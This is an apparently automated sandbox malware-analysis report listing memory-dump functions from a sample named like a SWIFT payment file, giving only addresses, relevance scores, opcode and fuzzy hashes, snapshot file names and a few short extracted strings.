Opcode ID: 43d62f1180697e11b1f9de9a7e69a59540784dc6f013277270b673010f5111f6
Instruction ID: 3d1dfdbf2ba411639e6aea1671bc1e009b3f1c4a0b8702230928cae330b141cb
Opcode Fuzzy Hash: 43d62f1180697e11b1f9de9a7e69a59540784dc6f013277270b673010f5111f6
Instruction Fuzzy Hash: 90E0E574E05208EFCB84DFA9E4446ACBBF9EB88310F10C0AA881893341E7359A42DF81

Function 060B0FA8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 279f4ff33ca7117c6579527a70a8970318aadda6e89f03dc2bd66b8cd7525ab8
Instruction ID: 5a35bd891562ceed774f1e72f90d14b2b7ee773865befeb8949023fd422996e9
Opcode Fuzzy Hash: 279f4ff33ca7117c6579527a70a8970318aadda6e89f03dc2bd66b8cd7525ab8
Instruction Fuzzy Hash: 5DE0E574E46208EFCB94DFA8D4456ADBBF4EB88304F10C4AA9819D3340D635AA42DF80

Function 060CDDB8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13958d49b9d99775ac784a5fc88d6a1f5def019219091ba17f8704bc12359739
Instruction ID: 25196bb8e3f8e3e6cf549808d592b883ad2f325c7eb7be5f64080270bb22cc3c
Opcode Fuzzy Hash: 13958d49b9d99775ac784a5fc88d6a1f5def019219091ba17f8704bc12359739
Instruction Fuzzy Hash: A1E0EE74D46208EFCB94EFA8E4442ADBBF6AB88310F1080AA8808A2244D6349A45DF90

Function 064B8B98 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2342275454.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bf230c775fb54aab2299a38b665838f6b52310e8de65f5d3d90ac66db924efa
Instruction ID: 6654880a3070b634575d129e098218775000aed9a0dcef89a913cba9819798bb
Opcode Fuzzy Hash: 2bf230c775fb54aab2299a38b665838f6b52310e8de65f5d3d90ac66db924efa
Instruction Fuzzy Hash: CFE04F74D09108EFC744DFA9D4405ACFBB8EB88300F10C0EAD85853341C6359B42DF91

Function 060C7291 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9702312f322f016607bbe4c99c7b54abdb4abfc7cd98b461bcd324f9200bdb3a
Instruction ID: 575a3fdbda52fb13092de8ed7416ddc8357319ecef8d79c4d796a8149b101a24
Opcode Fuzzy Hash: 9702312f322f016607bbe4c99c7b54abdb4abfc7cd98b461bcd324f9200bdb3a
Instruction Fuzzy Hash: C6F07F74E51618CFDB68CF19E98479CBBF2BF89310F6480A9E549A3264DA355D80CF01

Function 060CF7F8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d2af4f5973e4b388a42010459d51bec68b993616f9b07b10fee5b713c7b9c59
Instruction ID: 31e11bc6ba8518f617bc591ae9690e681c2156d11724a215223317f68ac25360
Opcode Fuzzy Hash: 9d2af4f5973e4b388a42010459d51bec68b993616f9b07b10fee5b713c7b9c59
Instruction Fuzzy Hash: 40E04634D05208EFCBC0DFA8E844AACBBF4AB48214F20C5AD8808D3340E7719E46CB91

Function 060BCD38 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 016178b7212359e14c12529e38bf332bd3c1cf7ee79b29302293abc53f0314e1
Instruction ID: 831743db3e789c17b53d8e46a1796d186f142648e1cc34dc455c180946dec979
Opcode Fuzzy Hash: 016178b7212359e14c12529e38bf332bd3c1cf7ee79b29302293abc53f0314e1
Instruction Fuzzy Hash: 5BE08C2174D3834FD7278639AC241867FF24F9690432885AFD4C1C7246EA24C90A8712

Function 064B9B70 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2342275454.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fdcca10187e81daa54d9785e26af801dc2552a600381baea297f2e4b1e506e8
Instruction ID: 0c561f48517f3ae35fca7e478c2718b70c47c311a50b4042f2ef83f9aa490705
Opcode Fuzzy Hash: 3fdcca10187e81daa54d9785e26af801dc2552a600381baea297f2e4b1e506e8
Instruction Fuzzy Hash: 59E02B34806208DFCB01EFF4D8086CF77F8EF46310F0044AA821497220EE754A04EB62

Function 064BE3F8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2342275454.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4505eb70cd4e1d8ddb72cc6fc54e8c081fddd0f8a807597caae735d776ee1583
Instruction ID: e57009fb7c4a9c410d1395fa4834423234286daf826e31324e4fe6c0bcb78014
Opcode Fuzzy Hash: 4505eb70cd4e1d8ddb72cc6fc54e8c081fddd0f8a807597caae735d776ee1583
Instruction Fuzzy Hash: 12E01238909108DBCB44DF94E9455EDBFB8EB85314F10D1AEC80857341CB325E56EF95

Function 060CE240 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab9ac632e4d32d0d3330493689e9b6a9aeb9b77f4dbee7b4e447b821a3587239
Instruction ID: 40eafce3d07a612c0779e4a30050e6640b820e0f224d019c6a3a783c3fffa77f
Opcode Fuzzy Hash: ab9ac632e4d32d0d3330493689e9b6a9aeb9b77f4dbee7b4e447b821a3587239
Instruction Fuzzy Hash: 12E0EC74D46209DFCB94EFA8E54969DBFF4AB45211F1041AA8808D3250E7705A44DB51

Function 060BF1E0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 370cadd34156695a1f5648bbf1d446fb45601016678ee2e1ec822970f32d7211
Instruction ID: 351fcfcb8500ebca4b8ebe6c14f12f620eb0ce2a0564f683d9d173b06fbed6f9
Opcode Fuzzy Hash: 370cadd34156695a1f5648bbf1d446fb45601016678ee2e1ec822970f32d7211
Instruction Fuzzy Hash: D2D017300192C4AFC3024B70C8A6CE7BFB8DF0B26030940E2FAC48F123D1219996CBB5

Function 060C873A Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a539cc28d94b98144d8330083767e7a734ad4bcab75c984bfbb11c00e2ebd087
Instruction ID: 2d9498d3226704aa253a97840a3f3273dea65acd5f9c9efbd2d79865c76127b3
Opcode Fuzzy Hash: a539cc28d94b98144d8330083767e7a734ad4bcab75c984bfbb11c00e2ebd087
Instruction Fuzzy Hash: 65F0FA78949629CFDB64DF28E88869DBBB1BB49301F1041E9D44EA3255D7311E85CF00

Function 060BE0BF Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e335f9b9e7b31b29419733cb97d403ff9e7493a800896ef814f059c5c45583b9
Instruction ID: cb6b6cf4cc0a683c16a57017c1a0927dbe7eff3546fed8b81f3979f27e72f9a7
Opcode Fuzzy Hash: e335f9b9e7b31b29419733cb97d403ff9e7493a800896ef814f059c5c45583b9
Instruction Fuzzy Hash: CBD02E32B002008FC3909BA8E0802E8FFB2EFE8211B100817C6C283241CB20045A9751

Function 060B1800 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 168096d4d62ad2bf0e1a81acbe9badc4afb8c8ea547528df632f17932bb35797
Instruction ID: 30d025bc521a872be1392c60654e50d217de3d47636f9d6e77c304f827e99126
Opcode Fuzzy Hash: 168096d4d62ad2bf0e1a81acbe9badc4afb8c8ea547528df632f17932bb35797
Instruction Fuzzy Hash: 71E01D70B40309EFCB04DF74D944B6D7BB5DF95200F504594D505D7344D9355F045B50

Function 060B17B8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe7cb6cb4a1341e7ff7947d2107bba3c7256885d5583291f27b616101319b77b
Instruction ID: 78055378d66174d9c0652bedabafd01b07fc5613ce79b93b80363567e0dede4e
Opcode Fuzzy Hash: fe7cb6cb4a1341e7ff7947d2107bba3c7256885d5583291f27b616101319b77b
Instruction Fuzzy Hash: D2E01270A4120AEFCB40EFA8D94065EB7F5EF85200F2045A9D509D7700E9765F449B91

Function 060B5F70 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 336cb002629487188bc5b1d5e76711a99f98b4a600d64b9d820165bf78d73fc3
Instruction ID: 0c8a83b2e1068453c4cdc1e9906a7c3a19167f8bfedaf4952e845716042a038a
Opcode Fuzzy Hash: 336cb002629487188bc5b1d5e76711a99f98b4a600d64b9d820165bf78d73fc3
Instruction Fuzzy Hash: 4CD0C97291D2C24FC7530B308826058BFB1CE735047298CDFD0C08A067E639090AD312

Function 060BCD20 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2549ee5b2657dadd40870a61c70da005b1a5db0befbe1d8d3013b12ef8726322
Instruction ID: 46e99d490bfe566b88cd1c7f6228b8c67a062fd049193421197fe07d7025d78b
Opcode Fuzzy Hash: 2549ee5b2657dadd40870a61c70da005b1a5db0befbe1d8d3013b12ef8726322
Instruction Fuzzy Hash: 4BC0484A44E3C10EC7A7BB300C70088BFB04C2B3003A998CBC4C8850A3D4080E4ED323

Function 060C77B8 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c35108472248dfd7fdbeea5c7692c07d33ab8d5f077e6cee71a303fb333b6f48
Instruction ID: c609958a1d0d0c9c281057549b52ce4bc84d2ecd19ad367a36d318d5ab9909e5
Opcode Fuzzy Hash: c35108472248dfd7fdbeea5c7692c07d33ab8d5f077e6cee71a303fb333b6f48
Instruction Fuzzy Hash: 38C04C76E1011E9BCF00DBD9F4408DCF774EF94325F004036D214A7104D6301526CF51

Function 060B3070 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8f79b6578d44f799b6d9da7e84bb1db3804c77710c90082c6dd0280f4e921d2
Instruction ID: 16a2af39b1d2bdd166053b22b6b2f4f59edd23cd7254beac3c5e6b71abf6420d
Opcode Fuzzy Hash: a8f79b6578d44f799b6d9da7e84bb1db3804c77710c90082c6dd0280f4e921d2
Instruction Fuzzy Hash: 96C08C302892C02FDB1242204D2A7017F209F07B00F1800C6A1C1880C2C08810419602

Function 060BF1F0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94

Non-executed Functions

Function 060B5AE8 Relevance: 2.8, Strings: 2, Instructions: 332COMMON

Download Yara Rule

Strings

,p, xrefs: 060B5BDE
(p, xrefs: 060B5E8C

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: (p$,p
API String ID: 0-2293223000
Opcode ID: 4f36b2c409c9fde7378caf951047b974e6b8913df2a92195f882549e235e1894
Instruction ID: 774a81376c182cafd7acc0ec685b7f64b5f3195bd306d81e49a640e1be8e46ea
Opcode Fuzzy Hash: 4f36b2c409c9fde7378caf951047b974e6b8913df2a92195f882549e235e1894
Instruction Fuzzy Hash: B2D12A34A406058FCB95DF68C984AADBBF2FF88314F29D4A9E515AB361D734EC81CB50

Function 01511D59 Relevance: 2.7, Strings: 2, Instructions: 171COMMON

Download Yara Rule

Strings

4'p, xrefs: 01511E1F
4'p, xrefs: 01511E4A

Memory Dump Source

Source File: 00000000.00000002.2320332430.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1510000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: 4'p$4'p
API String ID: 0-3973980265
Opcode ID: bc8b963ff799ccd479febdffd23187bafff3d52c3c760b1fa9703ef02793f7d9
Instruction ID: cb0b8bc9a80ee5daa67ac06d9c3cec26b6a9130c64b70466bc797f87977749be
Opcode Fuzzy Hash: bc8b963ff799ccd479febdffd23187bafff3d52c3c760b1fa9703ef02793f7d9
Instruction Fuzzy Hash: 16713CB4A112059FD719DFAAE99569EBBF2FBC8300F14C139C104EB2A8EB785905CF41

Function 01511D68 Relevance: 2.7, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

4'p, xrefs: 01511E1F
4'p, xrefs: 01511E4A

Memory Dump Source

Source File: 00000000.00000002.2320332430.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1510000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: 4'p$4'p
API String ID: 0-3973980265
Opcode ID: 3efa482b116af486bd83ba7e579ddb5d42f6edc2467ff3a3faa5b6b4878240cf
Instruction ID: 5a5c373c77501cd3734eef28d3550a7b05f68cf56ec3ab1977d064a3d4d54ea2
Opcode Fuzzy Hash: 3efa482b116af486bd83ba7e579ddb5d42f6edc2467ff3a3faa5b6b4878240cf
Instruction Fuzzy Hash: D2711BB4A116059FD709DFAAE99569EBBF3FBC8300F14C539C104EB2A8EB7859058F41

Function 060C0040 Relevance: 2.6, Strings: 2, Instructions: 79COMMON

Download Yara Rule

Strings

:, xrefs: 060C283F
v, xrefs: 060C010F

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: :$v
API String ID: 0-2654178555
Opcode ID: 672e5f3b5f1e3855c77086d9b3e78f25436342294a869576d73f8e8af053dd5e
Instruction ID: 2038674af2bd6dd85cc6e690627cc6a8b53f1251719d1ccad1cad2b768c7d6e0
Opcode Fuzzy Hash: 672e5f3b5f1e3855c77086d9b3e78f25436342294a869576d73f8e8af053dd5e
Instruction Fuzzy Hash: B431BBB1D056288BDB5DCF1BDC4069EFAF7AFC8300F04C1BA891DA6254DB740A818E40

Function 06344318 Relevance: 1.9, Strings: 1, Instructions: 613COMMON

Download Yara Rule

Strings

(p, xrefs: 06344628

Memory Dump Source

Source File: 00000000.00000002.2342191199.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6340000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: (p
API String ID: 0-4175582459
Opcode ID: 9a04bc8fd939842deeec707d2c6e4307b2e65a45cdd49925cfe8a89aa99a21cd
Instruction ID: 2cad556ef8f789c41d4df1e4a0e4dd52e7e957bb2ca5852a687dc25ca9e6c4f1
Opcode Fuzzy Hash: 9a04bc8fd939842deeec707d2c6e4307b2e65a45cdd49925cfe8a89aa99a21cd
Instruction Fuzzy Hash: BC328B70A002168FCB59DFA9C49476EFBF2FF88300F288569D556DB342CB34A959CB81

Function 05FD3C30 Relevance: 1.8, Instructions: 1797COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2340924209.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fd0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d6084f87915602732fc9fd0f7f264983fcfe077c15a639ec37f4f932c0b7d2
Instruction ID: 39ebc2c1ce073ecbe51f964379bfb3a91f6f158bc209f5b90b5e179c23b6aa37
Opcode Fuzzy Hash: e6d6084f87915602732fc9fd0f7f264983fcfe077c15a639ec37f4f932c0b7d2
Instruction Fuzzy Hash: 68D28C7041E3C4AFD7278B759C19B967F79AB03714F1A449BE180DA1E3C2B8584ACB72

Function 06216E5B Relevance: 1.6, Instructions: 1600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341848379.0000000006210000.00000004.08000000.00040000.00000000.sdmp, Offset: 06210000, based on PE: true

Associated: 00000000.00000002.2341981609.0000000006260000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6210000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8ef338a347d78b24a48a91f5c579d559d241ca399c22e27505efb135b2aab1a
Instruction ID: 1e833b7cab3b35291f54c7f769de193c11a8ff01eb7f7713ea194f1dbf0dab93
Opcode Fuzzy Hash: b8ef338a347d78b24a48a91f5c579d559d241ca399c22e27505efb135b2aab1a
Instruction Fuzzy Hash: A6C2876241E3C25FD3534B749DB66E1BFF1AEA321471E08DBD8C18F063E228594AD762

Function 060B10C0 Relevance: 1.5, Strings: 1, Instructions: 262COMMON

Download Yara Rule

Strings

Tep, xrefs: 060B1154

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: Tep
API String ID: 0-914316021
Opcode ID: 6a451fc914385f4786066e292a571cf0c1f382300ef329634aba4313a5314279
Instruction ID: f1f1bd8fa4bcbd7a3092dddababf89fb718c84dfff320719ff3d594dbde16d61
Opcode Fuzzy Hash: 6a451fc914385f4786066e292a571cf0c1f382300ef329634aba4313a5314279
Instruction Fuzzy Hash: C6B1E274E50208CFEB94CFA9D894BEDBBF2BB89304F24E0A9D509A7245DB345985CF40

Function 060B10B0 Relevance: 1.5, Strings: 1, Instructions: 259COMMON

Download Yara Rule

Strings

Tep, xrefs: 060B1154

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: Tep
API String ID: 0-914316021
Opcode ID: 7a4001280ad468f914574ba7f78c0a9df16853bf0fba46a04320649ed0e91f65
Instruction ID: 7583086540442dd79a8cd56035b9c750ecb9eec91df2b827f41642f7f3d79f5b
Opcode Fuzzy Hash: 7a4001280ad468f914574ba7f78c0a9df16853bf0fba46a04320649ed0e91f65
Instruction Fuzzy Hash: 9DB1E0B4E502088FEB94CFA9D894BDDBBF2AB89304F24D0A9D509A7245DB349985CF40

Function 06347BCF Relevance: 1.5, Strings: 1, Instructions: 211COMMON

Download Yara Rule

Strings

dp, xrefs: 06347EAA

Memory Dump Source

Source File: 00000000.00000002.2342191199.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6340000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: dp
API String ID: 0-2261812057
Opcode ID: 8264c91506c91f4f0ebf1df80cd1229a8ff08f379a00fbaf2f8269622eadbf15
Instruction ID: 9d85ef3c7f55d6da299f0e460c7e12ce0239f85490bac52877437fae31ea5d8a
Opcode Fuzzy Hash: 8264c91506c91f4f0ebf1df80cd1229a8ff08f379a00fbaf2f8269622eadbf15
Instruction Fuzzy Hash: E99128B4D152088FDB54EFA8D984BADBBF5FF8A300F10906AD505A7251DB386E85CF90

Function 06347C00 Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

dp, xrefs: 06347EAA

Memory Dump Source

Source File: 00000000.00000002.2342191199.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6340000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: dp
API String ID: 0-2261812057
Opcode ID: 906997e60dd39cb10bb1ca2d83752bce9d31571b76c3f9c9bca6d15eda50016a
Instruction ID: 8e19d3becb9d7cd32bec3dff0e142f8ba5f8ee3bf6a4c6cabc0cd5fc20fb98e4
Opcode Fuzzy Hash: 906997e60dd39cb10bb1ca2d83752bce9d31571b76c3f9c9bca6d15eda50016a
Instruction Fuzzy Hash: 9C8107B4D15208CFEB54EFA8D984BADB7F5FB8A300F109469D509A7254DB386E85CF80

Function 060C7D30 Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

%, xrefs: 060C7E2F

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: %
API String ID: 0-2567322570
Opcode ID: 0aaa43dc1939af2484a31454cb3a3b3634d6c1f6fc259826d130c3364d4de57a
Instruction ID: ef3cfbf418ca88dcf6962e3f6c189434f6f22a22eda02ca3ba98f8c8d3637999
Opcode Fuzzy Hash: 0aaa43dc1939af2484a31454cb3a3b3634d6c1f6fc259826d130c3364d4de57a
Instruction Fuzzy Hash: 0C519B71E04A188BEB58CF6BCC4069EFEF3AFC9311F14D1A9C459AA259E7344982CF54

Function 060CBCDD Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

S, xrefs: 060CD568

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: S
API String ID: 0-543223747
Opcode ID: a4cd5899bc23ac6f6b76f5a7af062ff7314d23c033c5bf98f3aa1ebded7bc7a4
Instruction ID: 6664be4dfbdaad6d2c762740f413caa7d0d9fe69578ef9ebdf2781192527992f
Opcode Fuzzy Hash: a4cd5899bc23ac6f6b76f5a7af062ff7314d23c033c5bf98f3aa1ebded7bc7a4
Instruction Fuzzy Hash: A7615E75E11228DFDBA0CFA9C884B9EBBF1BF49314F1485A9D458E7201D730AA86CF01

Function 015122F8 Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

A, xrefs: 015173A8

Memory Dump Source

Source File: 00000000.00000002.2320332430.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1510000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: e25dc0e0a94b55302b2da7aa4e9df3916a4265f143eef708dbe47cb7274538df
Instruction ID: a06592a7c9d6b2a68d0254e4f7fee0cb0a7fa697b4349b599600001989830b50
Opcode Fuzzy Hash: e25dc0e0a94b55302b2da7aa4e9df3916a4265f143eef708dbe47cb7274538df
Instruction Fuzzy Hash: 1D514D75D016588BEB6DCF6B8D456CAFAF3AFC9300F14C1FA994CA6218DB700AC58E40

Function 060C0006 Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

